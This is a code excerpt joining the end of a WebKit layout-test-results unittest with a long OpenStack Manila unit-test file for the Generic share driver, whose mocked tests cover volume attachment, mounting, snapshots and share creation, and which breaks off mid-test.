ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import unittest from webkitpy.common.net.layouttestresults import LayoutTestResults from webkitpy.common.system.outputcapture import OutputCapture from webkitpy.layout_tests.models import test_results from webkitpy.layout_tests.models import test_failures from webkitpy.thirdparty.BeautifulSoup import BeautifulSoup class LayoutTestResultsTest(unittest.TestCase): # The real files have no whitespace, but newlines make this much more readable. example_full_results_json = """ADD_RESULTS({ "tests": { "fast": { "dom": { "prototype-inheritance.html": { "expected": "PASS", "actual": "TEXT", "is_unexpected": true }, "prototype-banana.html": { "expected": "FAIL", "actual": "PASS", "is_unexpected": true }, "prototype-taco.html": { "expected": "PASS", "actual": "PASS TEXT", "is_unexpected": true }, "prototype-chocolate.html": { "expected": "FAIL", "actual": "IMAGE+TEXT" }, "prototype-strawberry.html": { "expected": "PASS", "actual": "IMAGE PASS", "is_unexpected": true } } }, "svg": { "dynamic-updates": { "SVGFEDropShadowElement-dom-stdDeviation-attr.html": { "expected": "PASS", "actual": "IMAGE", "has_stderr": true, "is_unexpected": true } } } }, "skipped": 450, "num_regressions": 15, "layout_tests_dir": "\/b\/build\/slave\/Webkit_Mac10_5\/build\/src\/third_party\/WebKit\/LayoutTests", "version": 3, "num_passes": 77, "has_pretty_patch": false, "fixable": 1220, "num_flaky": 0, "blink_revision": "1234", "has_wdiff": false });""" def test_results_from_string(self): self.assertIsNone(LayoutTestResults.results_from_string(None)) self.assertIsNone(LayoutTestResults.results_from_string("")) def test_was_interrupted(self): self.assertTrue(LayoutTestResults.results_from_string('ADD_RESULTS({"tests":{},"interrupted":true});').run_was_interrupted()) self.assertFalse(LayoutTestResults.results_from_string('ADD_RESULTS({"tests":{},"interrupted":false});').run_was_interrupted()) def test_blink_revision(self): self.assertEqual(LayoutTestResults.results_from_string(self.example_full_results_json).blink_revision(), 1234) def test_actual_results(self): results = LayoutTestResults.results_from_string(self.example_full_results_json) self.assertEqual(results.actual_results("fast/dom/prototype-banana.html"), "PASS") self.assertEqual(results.actual_results("fast/dom/prototype-taco.html"), "PASS TEXT") self.assertEqual(results.actual_results("nonexistant.html"), "")
jcsp/manila
refs/heads/master
manila/tests/share/drivers/test_generic.py
2
# Copyright (c) 2014 NetApp, Inc. # Copyright (c) 2015 Mirantis, Inc. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Unit tests for the Generic driver module.""" import os import time import ddt import mock from oslo_concurrency import processutils from oslo_config import cfg from six import moves from manila.common import constants as const from manila import compute from manila import context from manila import exception import manila.share.configuration from manila.share.drivers import generic from manila.share import share_types from manila import test from manila.tests import fake_compute from manila.tests import fake_service_instance from manila.tests import fake_share from manila.tests import fake_utils from manila.tests import fake_volume from manila import utils from manila import volume CONF = cfg.CONF def get_fake_manage_share(): return { 'id': 'fake', 'share_proto': 'NFS', 'share_type_id': 'fake', 'export_locations': [ {'path': '10.0.0.1:/foo/fake/path'}, {'path': '11.0.0.1:/bar/fake/path'}, ], } def get_fake_snap_dict(): snap_dict = { 'status': 'available', 'project_id': '13c0be6290934bd98596cfa004650049', 'user_id': 'a0314a441ca842019b0952224aa39192', 'description': None, 'deleted': '0', 'created_at': '2015-08-10 00:05:58', 'updated_at': '2015-08-10 00:05:58', 'consistency_group_id': '4b04fdc3-00b9-4909-ba1a-06e9b3f88b67', 'cgsnapshot_members': [ { 'status': 'available', 'share_type_id': '1a9ed31e-ee70-483d-93ba-89690e028d7f', 'share_id': 'e14b5174-e534-4f35-bc4f-fe81c1575d6f', 'user_id': 'a0314a441ca842019b0952224aa39192', 'deleted': 'False', 'created_at': '2015-08-10 00:05:58', 'share': { 'id': '03e2f06e-14f2-45a5-9631-0949d1937bd8', 'deleted': False, }, 'updated_at': '2015-08-10 00:05:58', 'share_proto': 'NFS', 'project_id': '13c0be6290934bd98596cfa004650049', 'cgsnapshot_id': 'f6aa3b59-57eb-421e-965c-4e182538e36a', 'deleted_at': None, 'id': '03e2f06e-14f2-45a5-9631-0949d1937bd8', 'size': 1, }, ], 'deleted_at': None, 'id': 'f6aa3b59-57eb-421e-965c-4e182538e36a', 'name': None, } return snap_dict def get_fake_cg_dict(): cg_dict = { 'status': 'creating', 'project_id': '13c0be6290934bd98596cfa004650049', 'user_id': 'a0314a441ca842019b0952224aa39192', 'description': None, 'deleted': 'False', 'created_at': '2015-08-10 00:07:58', 'updated_at': None, 'source_cgsnapshot_id': 'f6aa3b59-57eb-421e-965c-4e182538e36a', 'host': 'openstack2@cmodeSSVMNFS', 'deleted_at': None, 'shares': [ { 'id': '02a32f06e-14f2-45a5-9631-7483f1937bd8', 'deleted': False, 'source_cgsnapshot_member_id': '03e2f06e-14f2-45a5-9631-0949d1937bd8', }, ], 'share_types': [ { 'id': 'f6aa3b56-45a5-9631-02a32f06e1937b', 'deleted': False, 'consistency_group_id': '4b04fdc3-00b9-4909-ba1a-06e9b3f88b67', 'share_type_id': '1a9ed31e-ee70-483d-93ba-89690e028d7f', }, ], 'id': 'eda52174-0442-476d-9694-a58327466c14', 'name': None } return cg_dict def get_fake_collated_cg_snap_info(): fake_collated_cg_snap_info = [ { 'share': { 'id': '02a32f06e-14f2-45a5-9631-7483f1937bd8', 'deleted': False, 'source_cgsnapshot_member_id': '03e2f06e-14f2-45a5-9631-0949d1937bd8', }, 'snapshot': { 'id': '03e2f06e-14f2-45a5-9631-0949d1937bd8', }, }, ] return fake_collated_cg_snap_info @ddt.ddt class GenericShareDriverTestCase(test.TestCase): """Tests GenericShareDriver.""" def setUp(self): super(GenericShareDriverTestCase, self).setUp() self._context = context.get_admin_context() self._execute = mock.Mock(return_value=('', '')) self._helper_cifs = mock.Mock() self._helper_nfs = mock.Mock() CONF.set_default('driver_handles_share_servers', True) self.fake_conf = manila.share.configuration.Configuration(None) self.fake_private_storage = mock.Mock() self.mock_object(self.fake_private_storage, 'get', mock.Mock(return_value=None)) with mock.patch.object( generic.service_instance, 'ServiceInstanceManager', fake_service_instance.FakeServiceInstanceManager): self._driver = generic.GenericShareDriver( private_storage=self.fake_private_storage, execute=self._execute, configuration=self.fake_conf) self._driver.service_tenant_id = 'service tenant id' self._driver.service_network_id = 'service network id' self._driver.compute_api = fake_compute.API() self._driver.volume_api = fake_volume.API() self._driver.share_networks_locks = {} self._driver.get_service_instance = mock.Mock() self._driver.share_networks_servers = {} self._driver.admin_context = self._context self.fake_sn = {"id": "fake_sn_id"} self.fake_net_info = { "id": "fake_srv_id", "share_network_id": "fake_sn_id" } fsim = fake_service_instance.FakeServiceInstanceManager() sim = mock.Mock(return_value=fsim) self._driver.instance_manager = sim self._driver.service_instance_manager = sim self.fake_server = sim._create_service_instance( context="fake", instance_name="fake", share_network_id=self.fake_sn["id"], old_server_ip="fake") self.mock_object(utils, 'synchronized', mock.Mock(return_value=lambda f: f)) self.mock_object(generic.os.path, 'exists', mock.Mock(return_value=True)) self._driver._helpers = { 'CIFS': self._helper_cifs, 'NFS': self._helper_nfs, } self.share = fake_share.fake_share(share_proto='NFS') self.server = { 'instance_id': 'fake_instance_id', 'ip': 'fake_ip', 'username': 'fake_username', 'password': 'fake_password', 'pk_path': 'fake_pk_path', 'backend_details': { 'ip': '1.2.3.4', 'instance_id': 'fake', 'service_ip': 'fake_ip', }, 'availability_zone': 'fake_az', } self.access = fake_share.fake_access() self.snapshot = fake_share.fake_snapshot() self.mock_object(time, 'sleep') self.mock_debug_log = self.mock_object(generic.LOG, 'debug') self.mock_warning_log = self.mock_object(generic.LOG, 'warning') self.mock_error_log = self.mock_object(generic.LOG, 'error') self.mock_exception_log = self.mock_object(generic.LOG, 'exception') def test_do_setup(self): self.mock_object(volume, 'API') self.mock_object(compute, 'API') self.mock_object(self._driver, '_setup_helpers') self._driver.do_setup(self._context) volume.API.assert_called_once_with() compute.API.assert_called_once_with() self._driver._setup_helpers.assert_called_once_with() def test_setup_helpers(self): self._driver._helpers = {} CONF.set_default('share_helpers', ['NFS=fakenfs']) self.mock_object(generic.importutils, 'import_class', mock.Mock(return_value=self._helper_nfs)) self._driver._setup_helpers() generic.importutils.import_class.assert_has_calls([ mock.call('fakenfs') ]) self._helper_nfs.assert_called_once_with( self._execute, self._driver._ssh_exec, self.fake_conf ) self.assertEqual(len(self._driver._helpers), 1) def test_setup_helpers_no_helpers(self): self._driver._helpers = {} CONF.set_default('share_helpers', []) self.assertRaises(exception.ManilaException, self._driver._setup_helpers) def test__get_access_rule_for_data_copy_dhss_true(self): get_access_return = { 'access_level': 'rw', 'access_to': 'fake_ip', 'access_type': 'ip' } result = self._driver._get_access_rule_for_data_copy( self._context, self.share, self.server) self.assertEqual(get_access_return, result) def test__get_access_rule_for_data_copy_dhss_false(self): get_access_return = { 'access_level': 'rw', 'access_to': 'fake_ip', 'access_type': 'ip' } CONF.set_default('driver_handles_share_servers', False) CONF.set_default('migration_data_copy_node_ip', 'fake_ip') result = self._driver._get_access_rule_for_data_copy( self._context, self.share, self.server) self.assertEqual(get_access_return, result) def test_create_share(self): volume = 'fake_volume' volume2 = 'fake_volume2' self._helper_nfs.create_export.return_value = 'fakelocation' self.mock_object(self._driver, '_allocate_container', mock.Mock(return_value=volume)) self.mock_object(self._driver, '_attach_volume', mock.Mock(return_value=volume2)) self.mock_object(self._driver, '_format_device') self.mock_object(self._driver, '_mount_device') result = self._driver.create_share( self._context, self.share, share_server=self.server) self.assertEqual(result, 'fakelocation') self._driver._allocate_container.assert_called_once_with( self._driver.admin_context, self.share) self._driver._attach_volume.assert_called_once_with( self._driver.admin_context, self.share, self.server['backend_details']['instance_id'], volume) self._driver._format_device.assert_called_once_with( self.server['backend_details'], volume2) self._driver._mount_device.assert_called_once_with( self.share, self.server['backend_details'], volume2) def test_create_share_exception(self): share = fake_share.fake_share(share_network_id=None) self.assertRaises(exception.ManilaException, self._driver.create_share, self._context, share) def test_create_share_invalid_helper(self): self._driver._helpers = {'CIFS': self._helper_cifs} self.assertRaises(exception.InvalidShare, self._driver.create_share, self._context, self.share, share_server=self.server) def test_format_device(self): volume = {'mountpoint': 'fake_mount_point'} self.mock_object(self._driver, '_ssh_exec', mock.Mock(return_value=('', ''))) self._driver._format_device(self.server, volume) self._driver._ssh_exec.assert_called_once_with( self.server, ['sudo', 'mkfs.%s' % self.fake_conf.share_volume_fstype, volume['mountpoint']]) def test_mount_device_not_present(self): server = {'instance_id': 'fake_server_id'} mount_path = self._driver._get_mount_path(self.share) volume = {'mountpoint': 'fake_mount_point'} self.mock_object(self._driver, '_is_device_mounted', mock.Mock(return_value=False)) self.mock_object(self._driver, '_sync_mount_temp_and_perm_files') self.mock_object(self._driver, '_ssh_exec', mock.Mock(return_value=('', ''))) self._driver._mount_device(self.share, server, volume) self._driver._is_device_mounted.assert_called_once_with( mount_path, server, volume) self._driver._sync_mount_temp_and_perm_files.assert_called_once_with( server) self._driver._ssh_exec.assert_called_once_with( server, ['sudo mkdir -p', mount_path, '&&', 'sudo mount', volume['mountpoint'], mount_path, '&& sudo chmod 777', mount_path], ) def test_mount_device_present(self): mount_path = '/fake/mount/path' volume = {'mountpoint': 'fake_mount_point'} self.mock_object(self._driver, '_is_device_mounted', mock.Mock(return_value=True)) self.mock_object(self._driver, '_get_mount_path', mock.Mock(return_value=mount_path)) self.mock_object(generic.LOG, 'warning') self._driver._mount_device(self.share, self.server, volume) self._driver._get_mount_path.assert_called_once_with(self.share) self._driver._is_device_mounted.assert_called_once_with( mount_path, self.server, volume) generic.LOG.warning.assert_called_once_with(mock.ANY, mock.ANY) def test_mount_device_exception_raised(self): volume = {'mountpoint': 'fake_mount_point'} self.mock_object( self._driver, '_is_device_mounted', mock.Mock(side_effect=exception.ProcessExecutionError)) self.assertRaises( exception.ShareBackendException, self._driver._mount_device, self.share, self.server, volume, ) self._driver._is_device_mounted.assert_called_once_with( self._driver._get_mount_path(self.share), self.server, volume) def test_unmount_device_present(self): mount_path = '/fake/mount/path' self.mock_object(self._driver, '_is_device_mounted', mock.Mock(return_value=True)) self.mock_object(self._driver, '_sync_mount_temp_and_perm_files') self.mock_object(self._driver, '_get_mount_path', mock.Mock(return_value=mount_path)) self.mock_object(self._driver, '_ssh_exec', mock.Mock(return_value=('', ''))) self._driver._unmount_device(self.share, self.server) self._driver._get_mount_path.assert_called_once_with(self.share) self._driver._is_device_mounted.assert_called_once_with( mount_path, self.server) self._driver._sync_mount_temp_and_perm_files.assert_called_once_with( self.server) self._driver._ssh_exec.assert_called_once_with( self.server, ['sudo umount', mount_path, '&& sudo rmdir', mount_path], ) def test_unmount_device_retry_once(self): self.counter = 0 def _side_effect(*args): self.counter += 1 if self.counter < 2: raise exception.ProcessExecutionError mount_path = '/fake/mount/path' self.mock_object(self._driver, '_is_device_mounted', mock.Mock(return_value=True)) self.mock_object(self._driver, '_sync_mount_temp_and_perm_files') self.mock_object(self._driver, '_get_mount_path', mock.Mock(return_value=mount_path)) self.mock_object(self._driver, '_ssh_exec', mock.Mock(side_effect=_side_effect)) self._driver._unmount_device(self.share, self.server) self.assertEqual(1, time.sleep.call_count) self.assertEqual(self._driver._get_mount_path.mock_calls, [mock.call(self.share) for i in moves.range(2)]) self.assertEqual(self._driver._is_device_mounted.mock_calls, [mock.call(mount_path, self.server) for i in moves.range(2)]) self._driver._sync_mount_temp_and_perm_files.assert_called_once_with( self.server) self.assertEqual( self._driver._ssh_exec.mock_calls, [mock.call(self.server, ['sudo umount', mount_path, '&& sudo rmdir', mount_path]) for i in moves.range(2)] ) def test_unmount_device_not_present(self): mount_path = '/fake/mount/path' self.mock_object(self._driver, '_is_device_mounted', mock.Mock(return_value=False)) self.mock_object(self._driver, '_get_mount_path', mock.Mock(return_value=mount_path)) self.mock_object(generic.LOG, 'warning') self._driver._unmount_device(self.share, self.server) self._driver._get_mount_path.assert_called_once_with(self.share) self._driver._is_device_mounted.assert_called_once_with( mount_path, self.server) generic.LOG.warning.assert_called_once_with(mock.ANY, mock.ANY) def test_is_device_mounted_true(self): volume = {'mountpoint': 'fake_mount_point', 'id': 'fake_id'} mount_path = '/fake/mount/path' mounts = "%(dev)s on %(path)s" % {'dev': volume['mountpoint'], 'path': mount_path} self.mock_object(self._driver, '_ssh_exec', mock.Mock(return_value=(mounts, ''))) result = self._driver._is_device_mounted( mount_path, self.server, volume) self._driver._ssh_exec.assert_called_once_with( self.server, ['sudo', 'mount']) self.assertEqual(result, True) def test_is_device_mounted_true_no_volume_provided(self): mount_path = '/fake/mount/path' mounts = "/fake/dev/path on %(path)s type fake" % {'path': mount_path} self.mock_object(self._driver, '_ssh_exec', mock.Mock(return_value=(mounts, ''))) result = self._driver._is_device_mounted(mount_path, self.server) self._driver._ssh_exec.assert_called_once_with( self.server, ['sudo', 'mount']) self.assertEqual(result, True) def test_is_device_mounted_false(self): mount_path = '/fake/mount/path' volume = {'mountpoint': 'fake_mount_point', 'id': 'fake_id'} mounts = "%(dev)s on %(path)s" % {'dev': '/fake', 'path': mount_path} self.mock_object(self._driver, '_ssh_exec', mock.Mock(return_value=(mounts, ''))) result = self._driver._is_device_mounted( mount_path, self.server, volume) self._driver._ssh_exec.assert_called_once_with( self.server, ['sudo', 'mount']) self.assertEqual(result, False) def test_is_device_mounted_false_no_volume_provided(self): mount_path = '/fake/mount/path' mounts = "%(path)s" % {'path': 'fake'} self.mock_object(self._driver, '_ssh_exec', mock.Mock(return_value=(mounts, ''))) self.mock_object(self._driver, '_get_mount_path', mock.Mock(return_value=mount_path)) result = self._driver._is_device_mounted(mount_path, self.server) self._driver._ssh_exec.assert_called_once_with( self.server, ['sudo', 'mount']) self.assertEqual(result, False) def test_sync_mount_temp_and_perm_files(self): self.mock_object(self._driver, '_ssh_exec') self._driver._sync_mount_temp_and_perm_files(self.server) self._driver._ssh_exec.has_calls( mock.call( self.server, ['sudo', 'cp', const.MOUNT_FILE_TEMP, const.MOUNT_FILE]), mock.call(self.server, ['sudo', 'mount', '-a'])) def test_sync_mount_temp_and_perm_files_raise_error_on_copy(self): self.mock_object( self._driver, '_ssh_exec', mock.Mock(side_effect=exception.ProcessExecutionError)) self.assertRaises( exception.ShareBackendException, self._driver._sync_mount_temp_and_perm_files, self.server ) self._driver._ssh_exec.assert_called_once_with( self.server, ['sudo', 'cp', const.MOUNT_FILE_TEMP, const.MOUNT_FILE]) def test_sync_mount_temp_and_perm_files_raise_error_on_mount(self): def raise_error_on_mount(*args, **kwargs): if args[1][1] == 'cp': raise exception.ProcessExecutionError() self.mock_object(self._driver, '_ssh_exec', mock.Mock(side_effect=raise_error_on_mount)) self.assertRaises( exception.ShareBackendException, self._driver._sync_mount_temp_and_perm_files, self.server ) self._driver._ssh_exec.has_calls( mock.call( self.server, ['sudo', 'cp', const.MOUNT_FILE_TEMP, const.MOUNT_FILE]), mock.call(self.server, ['sudo', 'mount', '-a'])) def test_get_mount_path(self): result = self._driver._get_mount_path(self.share) self.assertEqual(result, os.path.join(CONF.share_mount_path, self.share['name'])) def test_attach_volume_not_attached(self): available_volume = fake_volume.FakeVolume() attached_volume = fake_volume.FakeVolume(status='in-use') self.mock_object(self._driver.compute_api, 'instance_volume_attach') self.mock_object(self._driver.volume_api, 'get', mock.Mock(return_value=attached_volume)) result = self._driver._attach_volume(self._context, self.share, 'fake_inst_id', available_volume) self._driver.compute_api.instance_volume_attach.\ assert_called_once_with(self._context, 'fake_inst_id', available_volume['id']) self._driver.volume_api.get.assert_called_once_with( self._context, attached_volume['id']) self.assertEqual(result, attached_volume) def test_attach_volume_attached_correct(self): fake_server = fake_compute.FakeServer() attached_volume = fake_volume.FakeVolume(status='in-use') self.mock_object(self._driver.compute_api, 'instance_volumes_list', mock.Mock(return_value=[attached_volume])) result = self._driver._attach_volume(self._context, self.share, fake_server, attached_volume) self.assertEqual(result, attached_volume) def test_attach_volume_attached_incorrect(self): fake_server = fake_compute.FakeServer() attached_volume = fake_volume.FakeVolume(status='in-use') anoter_volume = fake_volume.FakeVolume(id='fake_id2', status='in-use') self.mock_object(self._driver.compute_api, 'instance_volumes_list', mock.Mock(return_value=[anoter_volume])) self.assertRaises(exception.ManilaException, self._driver._attach_volume, self._context, self.share, fake_server, attached_volume) @ddt.data(exception.ManilaException, exception.Invalid) def test_attach_volume_failed_attach(self, side_effect): fake_server = fake_compute.FakeServer() available_volume = fake_volume.FakeVolume() self.mock_object(self._driver.compute_api, 'instance_volume_attach', mock.Mock(side_effect=side_effect)) self.assertRaises(exception.ManilaException, self._driver._attach_volume, self._context, self.share, fake_server, available_volume) self.assertEqual( 3, self._driver.compute_api.instance_volume_attach.call_count) def test_attach_volume_attached_retry_correct(self): fake_server = fake_compute.FakeServer() attached_volume = fake_volume.FakeVolume(status='available') in_use_volume = fake_volume.FakeVolume(status='in-use') side_effect = [exception.Invalid("Fake"), attached_volume] attach_mock = mock.Mock(side_effect=side_effect) self.mock_object(self._driver.compute_api, 'instance_volume_attach', attach_mock) self.mock_object(self._driver.compute_api, 'instance_volumes_list', mock.Mock(return_value=[attached_volume])) self.mock_object(self._driver.volume_api, 'get', mock.Mock(return_value=in_use_volume)) result = self._driver._attach_volume(self._context, self.share, fake_server, attached_volume) self.assertEqual(result, in_use_volume) self.assertEqual( 2, self._driver.compute_api.instance_volume_attach.call_count) def test_attach_volume_error(self): fake_server = fake_compute.FakeServer() available_volume = fake_volume.FakeVolume() error_volume = fake_volume.FakeVolume(status='error') self.mock_object(self._driver.compute_api, 'instance_volume_attach') self.mock_object(self._driver.volume_api, 'get', mock.Mock(return_value=error_volume)) self.assertRaises(exception.ManilaException, self._driver._attach_volume, self._context, self.share, fake_server, available_volume) def test_get_volume(self): volume = fake_volume.FakeVolume( name=CONF.volume_name_template % self.share['id']) self.mock_object(self._driver.volume_api, 'get_all', mock.Mock(return_value=[volume])) result = self._driver._get_volume(self._context, self.share['id']) self.assertEqual(result, volume) self._driver.volume_api.get_all.assert_called_once_with( self._context, {'all_tenants': True, 'name': volume['name']}) def test_get_volume_with_private_data(self): volume = fake_volume.FakeVolume() self.mock_object(self._driver.volume_api, 'get', mock.Mock(return_value=volume)) self.mock_object(self.fake_private_storage, 'get', mock.Mock(return_value=volume['id'])) result = self._driver._get_volume(self._context, self.share['id']) self.assertEqual(result, volume) self._driver.volume_api.get.assert_called_once_with( self._context, volume['id']) self.fake_private_storage.get.assert_called_once_with( self.share['id'], 'volume_id' ) def test_get_volume_none(self): vol_name = ( self._driver.configuration.volume_name_template % self.share['id']) self.mock_object(self._driver.volume_api, 'get_all', mock.Mock(return_value=[])) result = self._driver._get_volume(self._context, self.share['id']) self.assertIsNone(result) self._driver.volume_api.get_all.assert_called_once_with( self._context, {'all_tenants': True, 'name': vol_name}) def test_get_volume_error(self): volume = fake_volume.FakeVolume( name=CONF.volume_name_template % self.share['id']) self.mock_object(self._driver.volume_api, 'get_all', mock.Mock(return_value=[volume, volume])) self.assertRaises(exception.ManilaException, self._driver._get_volume, self._context, self.share['id']) self._driver.volume_api.get_all.assert_called_once_with( self._context, {'all_tenants': True, 'name': volume['name']}) def test_get_volume_snapshot(self): volume_snapshot = fake_volume.FakeVolumeSnapshot( name=self._driver.configuration.volume_snapshot_name_template % self.snapshot['id']) self.mock_object(self._driver.volume_api, 'get_all_snapshots', mock.Mock(return_value=[volume_snapshot])) result = self._driver._get_volume_snapshot(self._context, self.snapshot['id']) self.assertEqual(result, volume_snapshot) self._driver.volume_api.get_all_snapshots.assert_called_once_with( self._context, {'name': volume_snapshot['name']}) def test_get_volume_snapshot_with_private_data(self): volume_snapshot = fake_volume.FakeVolumeSnapshot() self.mock_object(self._driver.volume_api, 'get_snapshot', mock.Mock(return_value=volume_snapshot)) self.mock_object(self.fake_private_storage, 'get', mock.Mock(return_value=volume_snapshot['id'])) result = self._driver._get_volume_snapshot(self._context, self.snapshot['id']) self.assertEqual(result, volume_snapshot) self._driver.volume_api.get_snapshot.assert_called_once_with( self._context, volume_snapshot['id']) self.fake_private_storage.get.assert_called_once_with( self.snapshot['id'], 'volume_snapshot_id' ) def test_get_volume_snapshot_none(self): snap_name = ( self._driver.configuration.volume_snapshot_name_template % self.share['id']) self.mock_object(self._driver.volume_api, 'get_all_snapshots', mock.Mock(return_value=[])) result = self._driver._get_volume_snapshot(self._context, self.share['id']) self.assertIsNone(result) self._driver.volume_api.get_all_snapshots.assert_called_once_with( self._context, {'name': snap_name}) def test_get_volume_snapshot_error(self): volume_snapshot = fake_volume.FakeVolumeSnapshot( name=self._driver.configuration.volume_snapshot_name_template % self.snapshot['id']) self.mock_object( self._driver.volume_api, 'get_all_snapshots', mock.Mock(return_value=[volume_snapshot, volume_snapshot])) self.assertRaises( exception.ManilaException, self._driver._get_volume_snapshot, self._context, self.snapshot['id']) self._driver.volume_api.get_all_snapshots.assert_called_once_with( self._context, {'name': volume_snapshot['name']}) def test_detach_volume(self): available_volume = fake_volume.FakeVolume() attached_volume = fake_volume.FakeVolume(status='in-use') self.mock_object(self._driver, '_get_volume', mock.Mock(return_value=attached_volume)) self.mock_object(self._driver.compute_api, 'instance_volumes_list', mock.Mock(return_value=[attached_volume])) self.mock_object(self._driver.compute_api, 'instance_volume_detach') self.mock_object(self._driver.volume_api, 'get', mock.Mock(return_value=available_volume)) self._driver._detach_volume(self._context, self.share, self.server['backend_details']) self._driver.compute_api.instance_volume_detach.\ assert_called_once_with( self._context, self.server['backend_details']['instance_id'], available_volume['id']) self._driver.volume_api.get.assert_called_once_with( self._context, available_volume['id']) def test_detach_volume_detached(self): available_volume = fake_volume.FakeVolume() attached_volume = fake_volume.FakeVolume(status='in-use') self.mock_object(self._driver, '_get_volume', mock.Mock(return_value=attached_volume)) self.mock_object(self._driver.compute_api, 'instance_volumes_list', mock.Mock(return_value=[])) self.mock_object(self._driver.volume_api, 'get', mock.Mock(return_value=available_volume)) self.mock_object(self._driver.compute_api, 'instance_volume_detach') self._driver._detach_volume(self._context, self.share, self.server['backend_details']) self.assertFalse(self._driver.volume_api.get.called) self.assertFalse( self._driver.compute_api.instance_volume_detach.called) def test_allocate_container(self): fake_vol = fake_volume.FakeVolume() self.fake_conf.cinder_volume_type = 'fake_volume_type' self.mock_object(self._driver.volume_api, 'create', mock.Mock(return_value=fake_vol)) result = self._driver._allocate_container(self._context, self.share) self.assertEqual(result, fake_vol) self._driver.volume_api.create.assert_called_once_with( self._context, self.share['size'], CONF.volume_name_template % self.share['id'], '', snapshot=None, volume_type='fake_volume_type', availability_zone=self.share['availability_zone']) def test_allocate_container_with_snaphot(self): fake_vol = fake_volume.FakeVolume() fake_vol_snap = fake_volume.FakeVolumeSnapshot() self.mock_object(self._driver, '_get_volume_snapshot', mock.Mock(return_value=fake_vol_snap)) self.mock_object(self._driver.volume_api, 'create', mock.Mock(return_value=fake_vol)) result = self._driver._allocate_container(self._context, self.share, self.snapshot) self.assertEqual(result, fake_vol) self._driver.volume_api.create.assert_called_once_with( self._context, self.share['size'], CONF.volume_name_template % self.share['id'], '', snapshot=fake_vol_snap, volume_type=None, availability_zone=self.share['availability_zone']) def test_allocate_container_error(self): fake_vol = fake_volume.FakeVolume(status='error') self.mock_object(self._driver.volume_api, 'create', mock.Mock(return_value=fake_vol)) self.assertRaises(exception.ManilaException, self._driver._allocate_container, self._context, self.share) def test_wait_for_available_volume(self): fake_volume = {'status': 'creating', 'id': 'fake'} fake_available_volume = {'status': 'available', 'id': 'fake'} self.mock_object(self._driver.volume_api, 'get', mock.Mock(return_value=fake_available_volume)) actual_result = self._driver._wait_for_available_volume( fake_volume, 5, "error", "timeout") self.assertEqual(fake_available_volume, actual_result) self._driver.volume_api.get.assert_called_once_with( mock.ANY, fake_volume['id']) @mock.patch('time.sleep') def test_wait_for_available_volume_error_extending(self, mock_sleep): fake_volume = {'status': 'error_extending', 'id': 'fake'} self.assertRaises(exception.ManilaException, self._driver._wait_for_available_volume, fake_volume, 5, 'error', 'timeout') self.assertFalse(mock_sleep.called) @mock.patch('time.sleep') def test_wait_for_extending_volume(self, mock_sleep): initial_size = 1 expected_size = 2 mock_volume = fake_volume.FakeVolume(status='available', size=initial_size) mock_extending_vol = fake_volume.FakeVolume(status='extending', size=initial_size) mock_extended_vol = fake_volume.FakeVolume(status='available', size=expected_size) self.mock_object(self._driver.volume_api, 'get', mock.Mock(side_effect=[mock_extending_vol, mock_extended_vol])) result = self._driver._wait_for_available_volume( mock_volume, 5, "error", "timeout", expected_size=expected_size) expected_get_count = 2 self.assertEqual(mock_extended_vol, result) self._driver.volume_api.get.assert_has_calls( [mock.call(self._driver.admin_context, mock_volume['id'])] * expected_get_count) mock_sleep.assert_has_calls([mock.call(1)] * expected_get_count) @ddt.data(mock.Mock(return_value={'status': 'creating', 'id': 'fake'}), mock.Mock(return_value={'status': 'error', 'id': 'fake'})) def test_wait_for_available_volume_invalid(self, volume_get_mock): fake_volume = {'status': 'creating', 'id': 'fake'} self.mock_object(self._driver.volume_api, 'get', volume_get_mock) self.mock_object(time, 'time', mock.Mock(side_effect=[1.0, 1.33, 1.67, 2.0])) self.assertRaises( exception.ManilaException, self._driver._wait_for_available_volume, fake_volume, 1, "error", "timeout" ) def test_deallocate_container(self): fake_vol = fake_volume.FakeVolume() self.mock_object(self._driver, '_get_volume', mock.Mock(return_value=fake_vol)) self.mock_object(self._driver.volume_api, 'delete') self.mock_object(self._driver.volume_api, 'get', mock.Mock( side_effect=exception.VolumeNotFound(volume_id=fake_vol['id']))) self._driver._deallocate_container(self._context, self.share) self._driver._get_volume.assert_called_once_with( self._context, self.share['id']) self._driver.volume_api.delete.assert_called_once_with( self._context, fake_vol['id']) self._driver.volume_api.get.assert_called_once_with( self._context, fake_vol['id']) def test_deallocate_container_with_volume_not_found(self): fake_vol = fake_volume.FakeVolume() self.mock_object(self._driver, '_get_volume', mock.Mock(side_effect=exception.VolumeNotFound( volume_id=fake_vol['id']))) self.mock_object(self._driver.volume_api, 'delete') self._driver._deallocate_container(self._context, self.share) self._driver._get_volume.assert_called_once_with( self._context, self.share['id']) self.assertFalse(self._driver.volume_api.delete.called) def test_create_share_from_snapshot(self): vol1 = 'fake_vol1' vol2 = 'fake_vol2' self._helper_nfs.create_export.return_value = 'fakelocation' self.mock_object(self._driver, '_allocate_container', mock.Mock(return_value=vol1)) self.mock_object(self._driver, '_attach_volume', mock.Mock(return_value=vol2)) self.mock_object(self._driver, '_mount_device') result = self._driver.create_share_from_snapshot( self._context, self.share, self.snapshot, share_server=self.server) self.assertEqual(result, 'fakelocation') self._driver._allocate_container.assert_called_once_with( self._driver.admin_context, self.share, self.snapshot) self._driver._attach_volume.assert_called_once_with( self._driver.admin_context, self.share, self.server['backend_details']['instance_id'], vol1) self._driver._mount_device.assert_called_once_with( self.share, self.server['backend_details'], vol2) self._helper_nfs.create_export.assert_called_once_with( self.server['backend_details'], self.share['name']) def test_create_share_from_snapshot_invalid_helper(self): self._driver._helpers = {'CIFS': self._helper_cifs} self.assertRaises(exception.InvalidShare, self._driver.create_share_from_snapshot, self._context, self.share, self.snapshot, share_server=self.server) def test_delete_share_no_share_servers_handling(self): self.mock_object(self._driver, '_deallocate_container') self.mock_object( self._driver.service_instance_manager, 'get_common_server', mock.Mock(return_value=self.server)) self.mock_object( self._driver.service_instance_manager, 'ensure_service_instance', mock.Mock(return_value=False)) 